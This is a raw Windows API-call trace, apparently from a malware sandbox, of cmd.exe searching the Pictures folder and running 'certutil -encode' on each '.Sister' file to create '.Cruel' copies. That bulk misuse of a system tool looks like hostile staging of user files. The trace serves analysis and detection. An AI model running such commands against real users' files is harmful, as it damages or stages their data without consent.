[0302.257] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0302.257] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0302.257] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0302.257] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0302.257] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0302.257] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0302.257] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0302.257] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0302.258] ??_V@YAXPEAX@Z () returned 0x1 [0302.258] GetProcessHeap () returned 0x21ed8c70000 [0302.258] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9280160 [0302.258] GetProcessHeap () returned 0x21ed8c70000 [0302.258] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb6) returned 0x21ed8c96940 [0302.258] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0302.258] malloc (_Size=0xffce) returned 0x21eda100000 [0302.258] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0302.258] GetProcessHeap () returned 0x21ed8c70000 [0302.258] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9290150 [0302.260] SetErrorMode (uMode=0x0) returned 0x0 [0302.260] SetErrorMode (uMode=0x1) returned 0x0 [0302.260] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9290160, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0xa6cf4fdb80*="Pictures") returned 0x18 [0302.260] SetErrorMode (uMode=0x0) returned 0x1 [0302.260] GetProcessHeap () returned 0x21ed8c70000 [0302.260] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9290150, Size=0x54) returned 0x21ed9290150 [0302.260] GetProcessHeap () returned 0x21ed8c70000 [0302.260] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9290150) returned 0x54 [0302.260] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0302.260] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0302.260] GetProcessHeap () returned 0x21ed8c70000 [0302.260] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1be) returned 0x21ed937dcc0 [0302.260] GetProcessHeap () returned 0x21ed8c70000 [0302.260] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36c) returned 0x21ed8d44270 [0302.260] GetProcessHeap () returned 0x21ed8c70000 [0302.261] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44270, Size=0x1c0) returned 0x21ed937d750 [0302.261] GetProcessHeap () returned 0x21ed8c70000 [0302.261] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937d750) returned 0x1c0 [0302.261] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0302.261] GetProcessHeap () returned 0x21ed8c70000 [0302.261] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c758a0 [0302.261] GetProcessHeap () returned 0x21ed8c70000 [0302.261] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x7e) returned 0x21ed8c758a0 [0302.261] GetProcessHeap () returned 0x21ed8c70000 [0302.261] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x7e [0302.261] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0302.261] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0302.262] GetLastError () returned 0x2 [0302.262] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0302.262] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0302.263] GetLastError () returned 0x2 [0302.263] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0302.263] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7c9a0 [0302.264] FindClose (in: hFindFile=0x21ed8c7c9a0 | out: hFindFile=0x21ed8c7c9a0) returned 1 [0302.264] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0302.264] GetLastError () returned 0x2 [0302.264] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca00 [0302.264] FindClose (in: hFindFile=0x21ed8c7ca00 | out: hFindFile=0x21ed8c7ca00) returned 1 [0302.264] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0302.264] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0302.264] ??_V@YAXPEAX@Z () returned 0x1 [0302.265] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0302.265] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0302.265] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0302.265] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0302.265] GetProcessHeap () returned 0x21ed8c70000 [0302.265] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45bf0 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0302.266] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0302.267] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0302.267] GetProcessHeap () returned 0x21ed8c70000 [0302.267] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45bf0) returned 1 [0302.267] GetProcessHeap () returned 0x21ed8c70000 [0302.267] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95b20 [0302.267] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0302.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.268] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0302.268] _get_osfhandle (_FileHandle=0) returned 0x4c [0302.268] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0302.268] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"tust f-S-Eq-29XvQ_R.png.Sister\" \"tust f-S-Eq-29XvQ_R.png.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Pictures", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"tust f-S-Eq-29XvQ_R.png.Sister\" \"tust f-S-Eq-29XvQ_R.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"tust f-S-Eq-29XvQ_R.png.Sister\" \"tust f-S-Eq-29XvQ_R.png.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x1154, dwThreadId=0xc1c)) returned 1 [0302.281] CloseHandle (hObject=0xa8) returned 1 [0302.281] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0302.281] GetProcessHeap () returned 0x21ed8c70000 [0302.281] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0302.281] GetEnvironmentStringsW () returned 0x21ed937e320* [0302.281] GetProcessHeap () returned 0x21ed8c70000 [0302.281] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0302.281] FreeEnvironmentStringsA (penv="=") returned 1 [0302.281] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0302.724] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0302.724] CloseHandle (hObject=0xa4) returned 1 [0302.724] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0302.724] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0302.724] GetProcessHeap () returned 0x21ed8c70000 [0302.725] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0302.725] GetEnvironmentStringsW () returned 0x21ed937e320* [0302.725] GetProcessHeap () returned 0x21ed8c70000 [0302.725] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0302.725] FreeEnvironmentStringsA (penv="=") returned 1 [0302.725] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0302.725] GetProcessHeap () returned 0x21ed8c70000 [0302.725] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7010) returned 1 [0302.725] GetEnvironmentStringsW () returned 0x21ed937e320* [0302.725] GetProcessHeap () returned 0x21ed8c70000 [0302.725] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb42) returned 0x21ed8cc7010 [0302.726] FreeEnvironmentStringsA (penv="=") returned 1 [0302.726] GetProcessHeap () returned 0x21ed8c70000 [0302.726] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95b20) returned 1 [0302.726] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0302.726] ??_V@YAXPEAX@Z () returned 0x1 [0302.726] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7fef00, ftCreationTime.dwHighDateTime=0x1d5ea2f, ftLastAccessTime.dwLowDateTime=0xb26a7550, ftLastAccessTime.dwHighDateTime=0x1d5eb50, ftLastWriteTime.dwLowDateTime=0xb26a7550, ftLastWriteTime.dwHighDateTime=0x1d5eb50, nFileSizeHigh=0x0, nFileSizeLow=0x115d2, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="v9e3P.bmp.Sister", cAlternateFileName="")) returned 1 [0302.726] GetProcessHeap () returned 0x21ed8c70000 [0302.726] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45640, Size=0x2b6) returned 0x21ed8d45640 [0302.726] GetProcessHeap () returned 0x21ed8c70000 [0302.726] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45640) returned 0x2b6 [0302.726] GetProcessHeap () returned 0x21ed8c70000 [0302.726] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b12e0 [0302.726] GetProcessHeap () returned 0x21ed8c70000 [0302.726] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b12e0, Size=0x58) returned 0x21ed93b12e0 [0302.726] GetProcessHeap () returned 0x21ed8c70000 [0302.726] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b12e0) returned 0x58 [0302.726] GetProcessHeap () returned 0x21ed8c70000 [0302.726] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93b1350 [0302.726] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0302.726] GetProcessHeap () returned 0x21ed8c70000 [0302.726] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8a90 [0302.726] ??_V@YAXPEAX@Z () returned 0x1 [0302.727] malloc (_Size=0x1ff9c) returned 0x21eda100000 [0302.727] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cca0 [0302.727] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0302.727] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d000 [0302.727] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0302.728] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdf012b84, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdf012b84, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Pictures", cAlternateFileName="")) returned 0x21ed8c7d060 [0302.739] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0302.739] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\v9e3P.bmp.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae7fef00, ftCreationTime.dwHighDateTime=0x1d5ea2f, ftLastAccessTime.dwLowDateTime=0xb26a7550, ftLastAccessTime.dwHighDateTime=0x1d5eb50, ftLastWriteTime.dwLowDateTime=0xb26a7550, ftLastWriteTime.dwHighDateTime=0x1d5eb50, nFileSizeHigh=0x0, nFileSizeLow=0x115d2, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="v9e3P.bmp.Sister", cAlternateFileName="V9E3PB~1.SIS")) returned 0x21ed8c7cca0 [0302.739] FindClose (in: hFindFile=0x21ed8c7cca0 | out: hFindFile=0x21ed8c7cca0) returned 1 [0302.740] _wcsnicmp (_String1="V9E3PB~1.SIS", _String2="v9e3P.bmp.Sister", _MaxCount=0x10) returned 52 [0302.740] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0302.740] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0302.740] GetProcessHeap () returned 0x21ed8c70000 [0302.740] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45da0 [0302.740] ??_V@YAXPEAX@Z () returned 0x1 [0302.740] ??_V@YAXPEAX@Z () returned 0x1 [0302.740] GetProcessHeap () returned 0x21ed8c70000 [0302.740] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b1350, Size=0x180) returned 0x21ed93b1350 [0302.741] GetProcessHeap () returned 0x21ed8c70000 [0302.741] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b1350) returned 0x180 [0302.741] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0302.741] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.741] GetFileType (hFile=0x50) returned 0x2 [0302.741] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.741] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0302.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.743] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0302.754] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0302.754] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures") returned 0x18 [0302.754] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Pictures") returned 24 [0302.754] _vsnwprintf (in: _Buffer=0x21ed8e80190, _BufferCount=0x83cd, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0302.754] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.755] GetFileType (hFile=0x50) returned 0x2 [0302.755] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.755] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0302.755] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.755] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x19) returned 1 [0302.756] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.756] GetFileType (hFile=0x50) returned 0x2 [0302.756] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.756] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0302.756] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.756] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93b12f0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed93b12f0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0302.758] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"v9e3P.bmp.Sister\" \"v9e3P.bmp.Cruel\" ") returned 46 [0302.758] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.758] GetFileType (hFile=0x50) returned 0x2 [0302.758] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.758] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0302.758] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.758] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2e, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x2e) returned 1 [0302.759] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0302.759] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.759] GetFileType (hFile=0x50) returned 0x2 [0302.759] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.759] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0302.759] _get_osfhandle (_FileHandle=1) returned 0x50 [0302.759] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0302.765] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0302.766] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0302.768] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0302.768] malloc (_Size=0xffce) returned 0x21eda100000 [0302.768] ??_V@YAXPEAX@Z () returned 0x21eda100000 [0302.768] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0302.768] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0302.768] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0302.768] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0302.768] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0302.768] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0302.768] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0302.768] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0302.768] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0302.768] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0302.768] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0302.768] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0302.768] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0302.769] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0302.769] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0302.769] _wcsicmp (_String1="certutil", _String2="MD") returned -10 